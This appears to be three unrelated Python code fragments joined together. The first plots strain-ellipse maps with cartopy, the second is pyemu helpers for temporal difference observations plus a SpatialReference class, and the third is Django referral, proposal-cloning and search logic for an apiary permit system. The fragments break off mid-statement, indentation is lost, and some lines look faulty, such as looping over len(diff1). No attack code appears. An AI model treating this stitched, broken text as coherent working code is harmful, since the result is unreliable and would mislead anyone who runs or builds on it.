map_tile_type = kwargs.get('map_tile_type', 'terrain-background')
tiler = cimgt.Stamen(map_tile_type)
mercator = tiler.crs
if ax is None:
# To shift the Strain Ellipse about the center
shiftx = kwargs.get('shiftx', 0)
shifty = kwargs.get('shifty', 0)
bound_ = kwargs.get('bounds', 0.5)
figx = kwargs.get('figx', 15)
figy = kwargs.get('figy', 15)
fig = plt.figure(figsize=(figx, figy))
ax = fig.add_subplot(1, 1, 1, projection=mercator)
ax.set_extent([sites.longitude.max()+bound_, sites.longitude.min()-bound_, sites.latitude.min()-bound_, sites.latitude.max()+bound_], crs=ccrs.PlateCarree())
# Tiler Size
tiler_size = kwargs.get('tiler_size', 1)
ax.add_image(tiler, tiler_size, interpolation='spline36')
ax.set_aspect(1, 'datalim')
ax.gridlines(draw_labels=True)
plt.plot(sites.longitude, sites.latitude, color='blue', linestyle='--', linewidth=2, marker=',', transform=ccrs.PlateCarree(), zorder=20)
plt.plot(end_sites.longitude, end_sites.latitude, color='blue', linestyle='--', linewidth=2, marker=',', transform=ccrs.PlateCarree(), zorder=20)
plt.plot(sites.longitude, sites.latitude, color='black', linewidth=0, marker=',', transform=ccrs.PlateCarree(), label=sites.site, zorder=20)
bbox = fig.get_window_extent().transformed(fig.dpi_scale_trans.inverted())
width, height = bbox.width, bbox.height
my_dpi = fig.dpi
length = kwargs.get('length', 25)
scale_loc = kwargs.get('scale_loc', (0.5, 0.05))
llx0, llx1, lly0, lly1 = ax.get_extent(ccrs.PlateCarree())
sbllx = (llx1 + llx0) / 2
sblly = lly0 + (lly1 - lly0) * scale_loc[1]
tmc = ccrs.TransverseMercator(sbllx, sblly)
x0, x1, y0, y1 = ax.get_extent(tmc)
sbx = x0 + (x1 - x0) * scale_loc[0]
sby = y0 + (y1 - y0) * scale_loc[1]
sbxe = ((sbx + length * 500)/5)*2
sbxf = round(sbx - length * 500)
j = sbxf
k = 1
while k <= 5:
bar_xs = [j, j + sbxe]
if k % 2 == 0:
ax.plot(bar_xs, [sby, sby], transform=tmc, solid_capstyle='butt', color='w', linewidth=15, zorder=10)
else:
ax.plot(bar_xs, [sby, sby], transform=tmc, solid_capstyle='butt', color='k', linewidth=15, zorder=11)
j += sbxe
k += 1
buffer = [patheffects.withStroke(linewidth=2.5, foreground="w")]
hei_ = kwargs.get('hei_', 5)
ax.text(-1*sbxf, sby+(hei_*sby), str(length) + ' km', transform=tmc, fontsize=12,
family='Arial', path_effects=buffer, horizontalalignment='left', verticalalignment='bottom')
ax.text(sbxf, sby+(hei_*sby), '0 km', transform=tmc, fontsize=12,
family='Arial', path_effects=buffer, horizontalalignment='right', verticalalignment='bottom')
# Add Colors to site locations
color_list = kwargs.get('color_list', ['g', 'b', 'r'])
arrows = kwargs.get('arrows', 'off')
for i in range(len(sites)):
plt.draw()
lon, lat = sites.longitude[i], sites.latitude[i]
trans = ccrs.PlateCarree()._as_mpl_transform(ax)
x, y = trans.transform_point((lon, lat))
x_ = ((x/my_dpi))/width
y_ = ((y/my_dpi))/height
axi = fig.add_axes([(x_ - (5/width)*0.5), (y_ - (5/height)*0.5), (5/width), (5/height)])
colors = color_list
scale_arrow = kwargs.get('scale_arrow', 40)
if arrows == 'show':
axi.quiver(sites['E velocity (mm/yr)'][i], sites['N velocity (mm/yr)'][i], scale=scale_arrow, width=0.0175, headwidth=3.5, color='k')
axi.plot(0, 0, marker='o', markersize=10, color=colors[i])
axi.axis('equal')
axi.axis('off')
sites_h = []
for i in range(3):
site_0 = Line2D([0], [0], marker='o', color='b', linestyle='--',fillstyle='full', markeredgecolor='red',
markeredgewidth=0.0, label=sites.site[i], markerfacecolor=color_list[i], markersize=15)
sites_h.append(site_0)
# Set Legend Location
loc_ = kwargs.get('loc', 'upper center')
# Add Legend
leg = ax.legend(handles=[sites_h[0], sites_h[1], sites_h[2]], ncol=3, loc=loc_, fontsize="x-large")
leg.get_frame().set_edgecolor('k')
leg.get_frame().set_linewidth(0.5)
leg.get_frame().set_alpha(0.75)
plt.draw()
# Add in the e1 and e2 symbols
e1 = kwargs.get('e1', None)
e2 = kwargs.get('e2', None)
#e_loc = kwargs.get('e_loc', 'lower left')
e_rot = kwargs.get('e_rot', 0)
old_range = kwargs.get('old_range', [0.1, 300])
new_range_a = kwargs.get('new_range_a', [40, 80])
new_range_b = kwargs.get('new_range_b', [10, 15])
max_strain = kwargs.get('max_strain', 300)
min_strain = kwargs.get('min_strain', 0.1)
# Add Map Symbol
if None not in (e1, e2):
plt.draw()
lon, lat = lonc, latc
trans = ccrs.PlateCarree()._as_mpl_transform(ax)
x, y = trans.transform_point((lon, lat))
x_ = ((x/my_dpi))/width
y_ = ((y/my_dpi))/height
ax2 = fig.add_axes([(x_), (y_), (5/width), (5/height)])
ax2.set_xlim([-1,1])
ax2.set_ylim([-1,1])
strain_viz.map_symbol(self, e1, e2, rot=e_rot, old_range=old_range, new_range_a=new_range_a, new_range_b=new_range_b, max_strain=max_strain, min_strain=min_strain, ax=ax2)
ax2.axis('equal')
#ax2.axis('off')
p1 = ax.get_position()
p2 = ax2.get_position()
ax2.set_position([x_ - (p2.width/2 + shiftx), y_ - (p2.height/2 + shifty), p2.width, p2.height])
ax2.autoscale(False)
plt.draw()
axn = fig.add_axes([(x_), (y_), 0.05, 0.05])
buffer = [patheffects.withStroke(linewidth=4, foreground="w")]
axn.text(0.5, 0.0,u'\u25B2 \nN ', ha='center', fontsize=35, family='Arial', path_effects=buffer, rotation = 0)
axn.axis('equal')
axn.axis('off')
p3 = ax.get_position()
p4 = axn.get_position()
axn.set_position([p3.x0 + (0.05*p3.x1), p3.y0 + (0.05*p3.y1), 0.05, 0.05])
save_fig = kwargs.get('save_fig', None)
if save_fig is not None:
plt.savefig(str(save_fig), edgecolor='k', bbox_inches='tight')
def scale_arrow(value, old_range, new_range):
tmin, tmax = old_range
xmin, xmax = new_range
percent = abs((value - tmin) / (tmax - tmin))
return ((xmax - xmin) * percent) + xmin
def scale_arrow_percent(value, old_range):
tmin, tmax = old_range
return abs((value - tmin) / (tmax - tmin))
def map_symbol(self, e1, e2, **kwargs):
# Add Figure to plot
ax = kwargs.get('ax', 'none')
rot = kwargs.get('rot', 0)
old_range = kwargs.get('old_range', [0.1, 300])
new_range_a = kwargs.get('new_range_a', [40, 80])
new_range_b = kwargs.get('new_range_b', [10, 15])
max_strain = kwargs.get('max_strain', 300)
min_strain = kwargs.get('min_strain', 0.1)
sz_e1 = strain_viz.scale_arrow(e1 * 10**9, old_range, new_range_a)
sz_e2 = strain_viz.scale_arrow(e2 * 10**9, old_range, new_range_a)
sz_e1_d = strain_viz.scale_arrow(e1 * 10**9, old_range, new_range_b)
sz_e2_d = strain_viz.scale_arrow(e2 * 10**9, old_range, new_range_b)
sz_p_e1 = strain_viz.scale_arrow(e1 * 10**9, [min_strain, max_strain], [0.2, 0.6])
sz_p_e2 = strain_viz.scale_arrow(e2 * 10**9, [min_strain, max_strain], [0.2, 0.6])
scale_arrow_percent_0 = strain_viz.scale_arrow(e1 * 10**9, [min_strain, max_strain], [0.2, 0.6])
boxstyle0_d = f"darrow,pad=%s" % (scale_arrow_percent_0)
scale_arrow_percent_1 = strain_viz.scale_arrow(e2 * 10**9, [min_strain, max_strain], [0.2, 0.6])
boxstyle1_d = f"darrow,pad=%s" % (scale_arrow_percent_1)
#scale_arrow_percent_1 = str(round(strain_viz.scale_arrow_percent(e2 * 10**9, old_range), 1))
#boxstyle1_l = f"larrow,pad=%s" % (scale_arrow_percent_1)
#boxstyle1_r = f"rarrow,pad=%s" % (scale_arrow_percent_1)
if ax == 'none':
fig = plt.figure(figsize=(5, 5))
ax = fig.add_subplot(1, 1, 1)
ax.spines['left'].set_position('center')
ax.spines['right'].set_color('none')
ax.spines['bottom'].set_position('center')
ax.spines['top'].set_color('none')
ax.xaxis.set_ticks_position('bottom')
ax.yaxis.set_ticks_position('left')
ax.set_xlim([-1,1])
ax.set_ylim([-1,1])
if (e1 == 0) and (e2 < 0):
rot0 = mtrans.Affine2D().rotate_deg(rot)
x0, y0 = rot0.transform_point((0.0, sz_p_e2))
x1, y1 = rot0.transform_point((0.0, -sz_p_e2))
ax.annotate("",
xy=(0.0, 0.0),
xytext=(x0, y0), textcoords='data',
size=sz_e2, va="center", ha="center", color='k',
arrowprops=dict(arrowstyle="simple, head_length=0.35,head_width=0.5,tail_width=0.2", fc="k", ec='k', lw=2))
ax.annotate("",
xy=(0.0,0.0),
xytext=(x1, y1),
size=sz_e2, va="center", ha="center", color='k',
arrowprops=dict(arrowstyle="simple, head_length=0.35,head_width=0.5,tail_width=0.2", fc="k", ec='k', lw=2))
elif (e1 > 0) and (e2 == 0):
bbox_props1 = dict(boxstyle=boxstyle0_d, fc="w", ec="k", lw=3)
sz_text1 = "---------------" + ('-' * int(20*float(scale_arrow_percent_1)))
ax.text(0.0, 0.0, sz_text1, ha="center", va="center", rotation=rot + 90,
size=sz_e1_d, color='w',
bbox=bbox_props1)
elif | |
matters for the differencing. If False, then
the control file order is used. If observation names have a datetime suffix, make sure the format is
year-month-day to use this sorting. Default is True
long_names (`bool`, optional): flag to use long, descriptive names by concating the two observation names
that are being differenced. This will produce names that are too long for tradtional PEST(_HP).
Default is True.
prefix (`str`, optional): prefix to prepend to observation names and group names. Default is "dif".
Returns:
tuple containing
- **str**: the forward run command to execute the binary file process during model runs.
- **pandas.DataFrame**: a dataframe of observation information for use in the pest control file
Note:
this is the companion function of `helpers.apply_temporal_diff_obs()`.
"""
if not os.path.exists(ins_file):
raise Exception(
"setup_temporal_diff_obs() error: ins_file '{0}' not found".format(ins_file)
)
# the ins routines will check for missing obs, etc
try:
ins = pyemu.pst_utils.InstructionFile(ins_file, pst)
except Exception as e:
raise Exception(
"setup_temporal_diff_obs(): error processing instruction file: {0}".format(
str(e)
)
)
if out_file is None:
out_file = ins_file.replace(".ins", "")
# find obs groups from the obs names in the ins that have more than one observation
# (cant diff single entry groups)
obs = pst.observation_data
if include_zero_weight:
group_vc = pst.observation_data.loc[ins.obs_name_set, "obgnme"].value_counts()
else:
group_vc = obs.loc[
obs.apply(lambda x: x.weight > 0 and x.obsnme in ins.obs_name_set, axis=1),
"obgnme",
].value_counts()
groups = list(group_vc.loc[group_vc > 1].index)
if len(groups) == 0:
raise Exception(
"setup_temporal_diff_obs() error: no obs groups found "
+ "with more than one non-zero weighted obs"
)
# process each group
diff_dfs = []
for group in groups:
# get a sub dataframe with non-zero weighted obs that are in this group and in the instruction file
obs_group = obs.loc[obs.obgnme == group, :].copy()
obs_group = obs_group.loc[
obs_group.apply(
lambda x: x.weight > 0 and x.obsnme in ins.obs_name_set, axis=1
),
:,
]
# sort if requested
if sort_by_name:
obs_group = obs_group.sort_values(by="obsnme", ascending=True)
# the names starting with the first
diff1 = obs_group.obsnme[:-1].values
# the names ending with the last
diff2 = obs_group.obsnme[1:].values
# form a dataframe
diff_df = pd.DataFrame({"diff1": diff1, "diff2": diff2})
# build up some obs names
if long_names:
diff_df.loc[:, "obsnme"] = [
"{0}_{1}__{2}".format(prefix, d1, d2) for d1, d2 in zip(diff1, diff2)
]
else:
diff_df.loc[:, "obsnme"] = [
"{0}_{1}_{2}".format(prefix, group, c) for c in len(diff1)
]
# set the obs names as the index (per usual)
diff_df.index = diff_df.obsnme
# set the group name for the diff obs
diff_df.loc[:, "obgnme"] = "{0}_{1}".format(prefix, group)
# set the weights using the standard prop of variance formula
d1_std, d2_std = (
1.0 / obs_group.weight[:-1].values,
1.0 / obs_group.weight[1:].values,
)
diff_df.loc[:, "weight"] = 1.0 / (np.sqrt((d1_std ** 2) + (d2_std ** 2)))
diff_dfs.append(diff_df)
# concat all the diff dataframes
diff_df = pd.concat(diff_dfs)
# save the dataframe as a config file
config_file = ins_file.replace(".ins", ".diff.config")
f = open(config_file, "w")
if include_path:
# ins_path = os.path.split(ins_file)[0]
# f = open(os.path.join(ins_path,config_file),'w')
f.write(
"{0},{1}\n".format(os.path.split(ins_file)[-1], os.path.split(out_file)[-1])
)
# diff_df.to_csv(os.path.join(ins_path,config_file))
else:
f.write("{0},{1}\n".format(ins_file, out_file))
# diff_df.to_csv(os.path.join(config_file))
f.flush()
diff_df.to_csv(f, mode="a")
f.flush()
f.close()
# write the instruction file
diff_ins_file = config_file.replace(".config", ".processed.ins")
with open(diff_ins_file, "w") as f:
f.write("pif ~\n")
f.write("l1 \n")
for oname in diff_df.obsnme:
f.write("l1 w w w !{0}! \n".format(oname))
if include_path:
config_file = os.path.split(config_file)[-1]
diff_ins_file = os.path.split(diff_ins_file)[-1]
# if the corresponding output file exists, try to run the routine
if os.path.exists(out_file):
if include_path:
b_d = os.getcwd()
ins_path = os.path.split(ins_file)[0]
os.chdir(ins_path)
# try:
processed_df = apply_temporal_diff_obs(config_file=config_file)
# except Exception as e:
# if include_path:
# os.chdir(b_d)
#
# ok, now we can use the new instruction file to process the diff outputs
ins = pyemu.pst_utils.InstructionFile(diff_ins_file)
ins_pro_diff_df = ins.read_output_file(diff_ins_file.replace(".ins", ""))
if include_path:
os.chdir(b_d)
print(ins_pro_diff_df)
diff_df.loc[ins_pro_diff_df.index, "obsval"] = ins_pro_diff_df.obsval
frun_line = "pyemu.helpers.apply_temporal_diff_obs('{0}')\n".format(config_file)
return frun_line, diff_df
def apply_temporal_diff_obs(config_file):
"""process an instruction-output file pair and formulate difference observations.
Args:
config_file (`str`): configuration file written by `pyemu.helpers.setup_temporal_diff_obs`.
Returns:
diff_df (`pandas.DataFrame`) : processed difference observations
Note:
writes `config_file.replace(".config",".processed")` output file that can be read
with the instruction file that is created by `pyemu.helpers.setup_temporal_diff_obs()`.
this is the companion function of `helpers.setup_setup_temporal_diff_obs()`.
"""
if not os.path.exists(config_file):
raise Exception(
"apply_temporal_diff_obs() error: config_file '{0}' not found".format(
config_file
)
)
with open(config_file, "r") as f:
line = f.readline().strip().split(",")
ins_file, out_file = line[0], line[1]
diff_df = pd.read_csv(f)
if not os.path.exists(out_file):
raise Exception(
"apply_temporal_diff_obs() error: out_file '{0}' not found".format(out_file)
)
if not os.path.exists(ins_file):
raise Exception(
"apply_temporal_diff_obs() error: ins_file '{0}' not found".format(ins_file)
)
try:
ins = pyemu.pst_utils.InstructionFile(ins_file)
except Exception as e:
raise Exception(
"apply_temporal_diff_obs() error instantiating ins file: {0}".format(str(e))
)
try:
out_df = ins.read_output_file(out_file)
except Exception as e:
raise Exception(
"apply_temporal_diff_obs() error processing ins-out file pair: {0}".format(
str(e)
)
)
# make sure all the listed obs names in the diff_df are in the out_df
diff_names = set(diff_df.diff1.to_list())
diff_names.update(set(diff_df.diff2.to_list()))
missing = diff_names - set(list(out_df.index.values))
if len(missing) > 0:
raise Exception(
"apply_temporal_diff_obs() error: the following obs names in the config file "
+ "are not in the instruction file processed outputs :"
+ ",".join(missing)
)
diff_df.loc[:, "diff1_obsval"] = out_df.loc[diff_df.diff1.values, "obsval"].values
diff_df.loc[:, "diff2_obsval"] = out_df.loc[diff_df.diff2.values, "obsval"].values
diff_df.loc[:, "diff_obsval"] = diff_df.diff1_obsval - diff_df.diff2_obsval
processed_name = config_file.replace(".config", ".processed")
diff_df.loc[:, ["obsnme", "diff1_obsval", "diff2_obsval", "diff_obsval"]].to_csv(
processed_name, sep=" ", index=False
)
return diff_df
# web address of spatial reference dot org
srefhttp = "https://spatialreference.org"
class SpatialReference(object):
"""
a class to locate a structured model grid in x-y space.
Lifted wholesale from Flopy, and preserved here...
...maybe slighlty over-engineered for here
Parameters
----------
delr : numpy ndarray
the model discretization delr vector
(An array of spacings along a row)
delc : numpy ndarray
the model discretization delc vector
(An array of spacings along a column)
lenuni : int
the length units flag from the discretization package
(default 2)
xul : float
the x coordinate of the upper left corner of the grid
Enter either xul and yul or xll and yll.
yul : float
the y coordinate of the upper left corner of the grid
Enter either xul and yul or xll and yll.
xll : float
the x coordinate of the lower left corner of the grid
Enter either xul and yul or xll and yll.
yll : float
the y coordinate of the lower left corner of the grid
Enter either xul and yul or xll and yll.
rotation : float
the counter-clockwise rotation (in degrees) of the grid
proj4_str: str
a PROJ4 string that identifies the grid in space. warning: case
sensitive!
units : string
Units for the grid. Must be either feet or meters
epsg : int
EPSG code that identifies the grid in space. Can be used in lieu of
proj4. PROJ4 attribute will auto-populate if there is an internet
connection(via get_proj4 method).
See https://www.epsg-registry.org/ or spatialreference.org
length_multiplier : float
multiplier to convert model units to spatial reference units.
delr and delc above will be multiplied by this value. (default=1.)
Attributes
----------
xedge : ndarray
array of column edges
yedge : ndarray
array of row edges
xgrid : ndarray
numpy meshgrid of xedges
ygrid : ndarray
numpy meshgrid of yedges
xcenter : ndarray
array of column centers
ycenter : ndarray
array of row centers
xcentergrid : ndarray
numpy meshgrid of column centers
ycentergrid : ndarray
numpy meshgrid of row centers
vertices : 1D array
1D array of cell vertices for whole grid in C-style (row-major) order
(same as np.ravel())
Notes
-----
xul and yul can be explicitly (re)set after SpatialReference
instantiation, but only before any of the other attributes and methods are
accessed
"""
xul, yul = None, None
xll, yll = None, None
rotation = 0.0
length_multiplier = 1.0
origin_loc = "ul" # or ll
defaults = {
"xul": None,
"yul": None,
"rotation": 0.0,
"proj4_str": None,
"units": None,
"lenuni": 2,
"length_multiplier": None,
"source": "defaults",
}
lenuni_values = {"undefined": 0, "feet": 1, "meters": 2, "centimeters": 3}
lenuni_text = {v: k for k, v in lenuni_values.items()}
def __init__(
self,
delr=np.array([]),
delc=np.array([]),
lenuni=2,
xul=None,
yul=None,
xll=None,
yll=None,
rotation=0.0,
proj4_str=None,
epsg=None,
prj=None,
units=None,
length_multiplier=None,
source=None,
):
for delrc | |
if not self.proposal.can_assess(request.user):
raise exceptions.ProposalNotAuthorized()
self.processing_status = 'recalled'
self.save()
send_referral_recall_email_notification(self, request)
# TODO Log proposal action
self.proposal.log_user_action(ProposalUserAction.RECALL_REFERRAL.format(self.id, self.proposal.lodgement_number), request)
# TODO log organisation action
self.proposal.applicant.log_user_action(ProposalUserAction.RECALL_REFERRAL.format(self.id, self.proposal.lodgement_number), request)
def remind(self,request):
with transaction.atomic():
if not self.proposal.can_assess(request.user):
raise exceptions.ProposalNotAuthorized()
# Create a log entry for the proposal
self.proposal.log_user_action(ProposalUserAction.ACTION_REMIND_REFERRAL.format(self.id,self.proposal.lodgement_number,'{}({})'.format(self.referral.get_full_name(),self.referral.email)),request)
# Create a log entry for the organisation
self.proposal.applicant.log_user_action(ProposalUserAction.ACTION_REMIND_REFERRAL.format(self.id,self.proposal.lodgement_number,'{}({})'.format(self.referral.get_full_name(),self.referral.email)),request)
# send email
send_referral_email_notification(self,request,reminder=True)
def resend(self,request):
with transaction.atomic():
if not self.proposal.can_assess(request.user):
raise exceptions.ProposalNotAuthorized()
self.processing_status = 'with_referral'
self.proposal.processing_status = 'with_referral'
self.proposal.save()
self.sent_from = 1
self.save()
# Create a log entry for the proposal
self.proposal.log_user_action(ProposalUserAction.ACTION_RESEND_REFERRAL_TO.format(self.id,self.proposal.lodgement_number,'{}({})'.format(self.referral.get_full_name(),self.referral.email)),request)
# Create a log entry for the organisation
self.proposal.applicant.log_user_action(ProposalUserAction.ACTION_RESEND_REFERRAL_TO.format(self.id,self.proposal.lodgement_number,'{}({})'.format(self.referral.get_full_name(),self.referral.email)),request)
# send email
send_referral_email_notification(self,request)
def complete(self,request, referral_comment):
with transaction.atomic():
try:
if request.user != self.referral:
raise exceptions.ReferralNotAuthorized()
self.processing_status = 'completed'
self.referral_text = referral_comment
self.save()
# TODO Log proposal action
self.proposal.log_user_action(ProposalUserAction.CONCLUDE_REFERRAL.format(self.id,self.proposal.lodgement_number,'{}({})'.format(self.referral.get_full_name(),self.referral.email)),request)
# TODO log organisation action
self.proposal.applicant.log_user_action(ProposalUserAction.CONCLUDE_REFERRAL.format(self.id,self.proposal.lodgement_number,'{}({})'.format(self.referral.get_full_name(),self.referral.email)),request)
send_referral_complete_email_notification(self,request)
except:
raise
def send_referral(self,request,referral_email,referral_text):
with transaction.atomic():
try:
referral_email = referral_email.lower()
if self.proposal.processing_status == 'with_referral':
if request.user != self.referral:
raise exceptions.ReferralNotAuthorized()
if self.sent_from != 1:
raise exceptions.ReferralCanNotSend()
self.proposal.processing_status = 'with_referral'
self.proposal.save()
referral = None
# Check if the user is in ledger
try:
user = EmailUser.objects.get(email__icontains=referral_email)
except EmailUser.DoesNotExist:
# Validate if it is a deparment user
department_user = get_department_user(referral_email)
if not department_user:
raise ValidationError('The user you want to send the referral to is not a member of the department')
# Check if the user is in ledger or create
user,created = EmailUser.objects.get_or_create(email=department_user['email'].lower())
if created:
user.first_name = department_user['given_name']
user.last_name = department_user['surname']
user.save()
qs=Referral.objects.filter(sent_by=user, proposal=self.proposal)
if qs:
raise ValidationError('You cannot send referral to this user')
try:
Referral.objects.get(referral=user,proposal=self.proposal)
raise ValidationError('A referral has already been sent to this user')
except Referral.DoesNotExist:
# Create Referral
referral = Referral.objects.create(
proposal = self.proposal,
referral=user,
sent_by=request.user,
sent_from=2,
text=referral_text
)
# Create a log entry for the proposal
self.proposal.log_user_action(ProposalUserAction.ACTION_SEND_REFERRAL_TO.format(referral.id,self.proposal.lodgement_number,'{}({})'.format(user.get_full_name(),user.email)),request)
# Create a log entry for the organisation
self.proposal.applicant.log_user_action(ProposalUserAction.ACTION_SEND_REFERRAL_TO.format(referral.id,self.proposal.lodgement_number,'{}({})'.format(user.get_full_name(),user.email)),request)
# send email
send_referral_email_notification(referral,request)
else:
raise exceptions.ProposalReferralCannotBeSent()
except:
raise
# Properties
@property
def region(self):
return self.proposal.region
@property
def activity(self):
return self.proposal.activity
@property
def title(self):
return self.proposal.title
@property
def applicant(self):
return self.proposal.applicant.name
@property
def can_be_processed(self):
return self.processing_status == 'with_referral'
def can_assess_referral(self,user):
return self.processing_status == 'with_referral'
@receiver(pre_delete, sender=Proposal)
def delete_documents(sender, instance, *args, **kwargs):
for document in instance.documents.all():
document.delete()
def clone_proposal_with_status_reset(proposal):
with transaction.atomic():
try:
proposal.customer_status = 'draft'
proposal.processing_status = 'draft'
proposal.assessor_data = None
proposal.comment_data = None
#proposal.id_check_status = 'not_checked'
#proposal.character_check_status = 'not_checked'
#proposal.compliance_check_status = 'not_checked'
#Sproposal.review_status = 'not_reviewed'
proposal.lodgement_number = ''
proposal.lodgement_sequence = 0
proposal.lodgement_date = None
proposal.assigned_officer = None
proposal.assigned_approver = None
proposal.approval = None
original_proposal_id = proposal.id
#proposal.previous_application = Proposal.objects.get(id=original_proposal_id)
proposal.id = None
proposal.approval_level_document = None
proposal.save(no_revision=True)
# clone documents
for proposal_document in ProposalDocument.objects.filter(proposal=original_proposal_id):
proposal_document.proposal = proposal
proposal_document.id = None
proposal_document._file.name = u'proposals/{}/documents/{}'.format(proposal.id, proposal_document.name)
proposal_document.can_delete = True
proposal_document.save()
# copy documents on file system and reset can_delete flag
subprocess.call('cp -pr media/proposals/{} media/proposals/{}'.format(original_proposal_id, proposal.id), shell=True)
return proposal
except:
raise
def clone_apiary_proposal_with_status_reset(original_proposal):
#import ipdb; ipdb.set_trace()
with transaction.atomic():
try:
proposal = copy.deepcopy(original_proposal)
proposal.id = None
#proposal.application_type = ApplicationType.objects.filter(name=ApplicationType.APIARY)[0]
proposal.application_type = ApplicationType.objects.get(name=ApplicationType.APIARY)
proposal.save(no_revision=True)
# create proposal_apiary and associate it with the proposal
proposal_apiary = ProposalApiary.objects.create(proposal=proposal)
#proposal_apiary = proposal_apiary.proposal
proposal_apiary.save()
proposal.customer_status = 'draft'
proposal.processing_status = 'draft'
proposal.assessor_data = None
proposal.comment_data = None
proposal.lodgement_number = ''
proposal.lodgement_sequence = 0
proposal.lodgement_date = None
proposal.assigned_officer = None
proposal.assigned_approver = None
#proposal.approval = None
#original_proposal_id = proposal.id
#proposal.id = None
proposal.approval_level_document = None
proposal.fee_invoice_reference = None
proposal.activity = 'Apiary Renewal'
proposal.save(no_revision=True)
## clone documents
#for proposal_document in DeedPollDocument.objects.filter(proposal=original_proposal.id):
# proposal_document.proposal = proposal
# proposal_document.id = None
# path = default_storage.save(
# '{}/proposals/{}/deed_poll_documents/{}'.format(
# settings.MEDIA_APIARY_DIR, proposal.id, proposal_document.name), ContentFile(
# proposal_document._file.read()))
# proposal_document._file = path
# proposal_document.can_delete = True
# proposal_document.save()
# copy documents on file system and reset can_delete flag
#subprocess.call('cp -pr media/proposals/{} media/proposals/{}'.format(original_proposal.id, proposal.id), shell=True)
# clone requirements
approval = original_proposal.proposal_apiary.retrieve_approval
req = approval.proposalrequirement_set.exclude(is_deleted=True)
#from copy import deepcopy
if req:
for r in req:
old_r = copy.deepcopy(r)
r.proposal = proposal
r.copied_from=old_r
r.id = None
r.save()
# update apiary_sites with new proposal
approval.add_apiary_sites_to_proposal_apiary_for_renewal(proposal_apiary)
# for site in approval.apiary_sites.all():
# Create new relations between the ApiarySite and the ProposalApiary
# ApiarySiteOnProposal.objects.create(apiary_site=site, proposal_apiary=proposal.proposal_apiary)
# site.proposal_apiary = proposal.proposal_apiary
# site.save()
# Checklist questions
for question in ApiaryChecklistQuestion.objects.filter(
checklist_type='apiary',
checklist_role='applicant'
):
new_answer = ApiaryChecklistAnswer.objects.create(proposal = proposal.proposal_apiary,
question = question)
# update approval.current_proposal
#approval.current_proposal = proposal
#approval.save()
# Set previous_application to maintain proposal history
#proposal_apiary.proposal.previous_application = approval.current_proposal
#proposal_apiary.proposal.save()
return proposal
except:
raise
def searchKeyWords(searchWords, searchProposal, searchApproval, searchCompliance, is_internal= True):
from disturbance.utils import search, search_approval, search_compliance
from disturbance.components.approvals.models import Approval
from disturbance.components.compliances.models import Compliance
qs = []
if is_internal:
proposal_list = Proposal.objects.filter(application_type__name='Disturbance').exclude(processing_status__in=[Proposal.PROCESSING_STATUS_DISCARDED, Proposal.PROCESSING_STATUS_DRAFT])
approval_list = Approval.objects.all().order_by('lodgement_number', '-issue_date').distinct('lodgement_number')
compliance_list = Compliance.objects.all()
if searchWords:
if searchProposal:
for p in proposal_list:
if p.data:
try:
results = search(p.data[0], searchWords)
final_results = {}
if results:
for r in results:
for key, value in r.items():
final_results.update({'key': key, 'value': value})
res = {
'number': p.lodgement_number,
'id': p.id,
'type': 'Proposal',
'applicant': p.applicant.name,
'text': final_results,
}
qs.append(res)
except:
raise
if searchApproval:
for a in approval_list:
try:
results = search_approval(a, searchWords)
qs.extend(results)
except:
raise
if searchCompliance:
for c in compliance_list:
try:
results = search_compliance(c, searchWords)
qs.extend(results)
except:
raise
return qs
def search_reference(reference_number):
from disturbance.components.approvals.models import Approval
from disturbance.components.compliances.models import Compliance
proposal_list = Proposal.objects.all().exclude(processing_status__in=[Proposal.PROCESSING_STATUS_DISCARDED,])
approval_list = Approval.objects.all().order_by('lodgement_number', '-issue_date').distinct('lodgement_number')
compliance_list = Compliance.objects.all().exclude(processing_status__in=['future'])
record = {}
try:
result = proposal_list.get(lodgement_number = reference_number)
record = { 'id': result.id,
'type': 'proposal' }
except Proposal.DoesNotExist:
try:
result = approval_list.get(lodgement_number = reference_number)
record = { 'id': result.id,
'type': 'approval' }
except Approval.DoesNotExist:
try:
for c in compliance_list:
if c.reference == reference_number:
record = { 'id': c.id,
'type': 'compliance' }
except:
raise ValidationError('Record with provided reference number does not exist')
if record:
return record
else:
raise ValidationError('Record with provided reference number does not exist')
from ckeditor.fields import RichTextField
class HelpPage(models.Model):
HELP_TEXT_EXTERNAL = 1
HELP_TEXT_INTERNAL = 2
HELP_TYPE_CHOICES = (
(HELP_TEXT_EXTERNAL, 'External'),
(HELP_TEXT_INTERNAL, 'Internal'),
)
application_type = models.ForeignKey(ApplicationType)
content = RichTextField()
description = models.CharField(max_length=256, blank=True, null=True)
help_type = models.SmallIntegerField('Help Type', choices=HELP_TYPE_CHOICES, default=HELP_TEXT_EXTERNAL)
version = models.SmallIntegerField(default=1, blank=False, null=False)
class Meta:
app_label = 'disturbance'
unique_together = ('application_type', 'help_type', 'version')
# --------------------------------------------------------------------------------------
# Apiary Models Start
# --------------------------------------------------------------------------------------
class ApiarySiteOnProposal(RevisionedMixin):
apiary_site = models.ForeignKey('ApiarySite',)
proposal_apiary = models.ForeignKey('ProposalApiary',)
apiary_site_status_when_submitted = models.CharField(max_length=40, blank=True)
apiary_site_is_vacant_when_submitted = models.BooleanField(default=False)
for_renewal = models.BooleanField(default=False)
site_status = models.CharField(default=SITE_STATUS_DRAFT, max_length=20, db_index=True)
making_payment = models.BooleanField(default=False)
workflow_selected_status = models.BooleanField(default=False) # This field is used only during approval process to select/deselect the site to be approved
created_at = models.DateTimeField(auto_now_add=True)
modified_at = models.DateTimeField(auto_now=True)
wkb_geometry_draft = PointField(srid=4326, blank=True, null=True) # store the coordinates before submit
wkb_geometry_processed = PointField(srid=4326, blank=True, null=True) # store approved coordinates
site_category_draft = models.ForeignKey('SiteCategory', null=True, blank=True, related_name='intermediate_draft')
site_category_processed = models.ForeignKey('SiteCategory', null=True, blank=True, related_name='intermediate_processed')
application_fee_paid = models.BooleanField(default=False) # To avoid overcharging when the proposal is sent back to the customer, we need this flag
objects = GeoManager()
def __str__(self):
return 'id:{}: (apiary_site: {}, proposal_apiary: {})'.format(self.id, self.apiary_site.id, self.proposal_apiary.id)
class Meta:
app_label = 'disturbance'
unique_together = ['apiary_site', 'proposal_apiary',]
class ProposalApiary(RevisionedMixin):
title = models.CharField('Title', max_length=200, null=True)
location = gis_models.PointField(srid=4326, blank=True, null=True)
proposal = models.OneToOneField(Proposal, related_name='proposal_apiary', null=True)
# We don't use GIS field, because these are just fields user input into the <input> field
latitude = models.DecimalField(max_digits=9, decimal_places=6, null=True, blank=True)
longitude = models.DecimalField(max_digits=9, decimal_places=6, null=True, blank=True)
# required for Site Transfer applications
